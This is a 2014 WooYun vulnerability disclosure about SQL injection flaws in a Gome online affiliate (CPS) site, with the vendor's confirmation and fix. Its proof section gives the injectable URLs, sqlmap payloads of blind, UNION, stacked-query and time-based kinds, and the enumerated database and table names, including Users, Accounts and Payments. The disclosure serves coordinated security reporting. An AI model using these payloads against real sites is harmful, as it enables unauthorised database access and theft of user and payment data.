当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-051102

漏洞标题:国美在线某站点SQL注入合集

相关厂商:国美控股集团

漏洞作者: HackBraid

提交时间:2014-02-16 14:53

修复时间:2014-04-02 14:53

公开时间:2014-04-02 14:53

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:6

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-02-16: 细节已通知厂商并且等待厂商处理中
2014-02-24: 厂商已经确认,细节仅向厂商公开
2014-03-06: 细节向核心白帽子及相关领域专家公开
2014-03-16: 细节向普通白帽子公开
2014-03-26: 细节向实习白帽子公开
2014-04-02: 细节向公众公开

简要描述:

SQL注入

详细说明:

站点:
http://cps.gome.com.cn/
注入点:
1.http://cps.gome.com.cn/Home/NoticeDetail?id=132
2.http://cps.gome.com.cn/Earner/GetCode/AdsUserSelfEdit?id=901&webname=%E5%AE%B6%E7%BE%8E id=901
站点的注入点修复不完全,只是跳转,关键的传递参数未做处理。

漏洞证明:

以第一个注入点为例:
数据库:

Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=132' AND 1148=1148 AND 'bVwH'='bVwH
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: id=-1683' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(98)+CHAR(120)+CHAR(114)+CHAR(113)+CHAR(89)+CHAR(108)+CHAR(100)+CHAR(118)+CHAR(115)+CHAR(102)+CHAR(118)+CHAR(83)+CHAR(102)+CHAR(115)+CHAR(113)+CHAR(101)+CHAR(102)+CHAR(117)+CHAR(113),NULL,NULL,NULL,NULL-- 
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=132'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=132' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
available databases [5]:
[*] GomeCps
[*] master
[*] model
[*] msdb
[*] tempdb


GomeCps数据库的table:

Database: GomeCps
[46 tables]
+-------------------------+
| Accounts                |
| AdsCode                 |
| AdsCode                 |
| AdsUserSelf             |
| BackupCookies           |
| BannerAds               |
| BaseCPSOriDataEffects   |
| CPSNoEffectBanlce       |
| CPSOriDataEffect_Backup |
| CPSOriDataEffect_Backup |
| CPSOriDataOccur_Backup  |
| CPSOriDataOccur_Backup  |
| CommissionByPcd         |
| Commissions             |
| CookiesRecent           |
| Cookies_D               |
| Cookies_D               |
| CurrentSettlements      |
| EarnerInfos             |
| HelpSetUp               |
| IpReport                |
| IpReportRecent          |
| MemberType              |
| Notices                 |
| PageGroup               |
| Payments                |
| Products                |
| RecommendedAd           |
| RoleAuthority           |
| Roles                   |
| SettlementHistorys      |
| SettlementLogs          |
| ShowComTop              |
| SiteType                |
| StageCommissionLogs     |
| StageCommissionLogs     |
| Taxs                    |
| TemporaryBackupCookies  |
| Users                   |
| WebSites                |
| categorysHistory        |
| categorysHistory        |
| modules                 |
| plan                    |
| sqlmapfile              |
| sysdiagrams             |
+-------------------------+

修复方案:

对传递的参数进行处理

版权声明:转载请注明来源 HackBraid@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2014-02-24 15:18

厂商回复:

已对漏洞进行修复,谢谢支持

最新状态:

暂无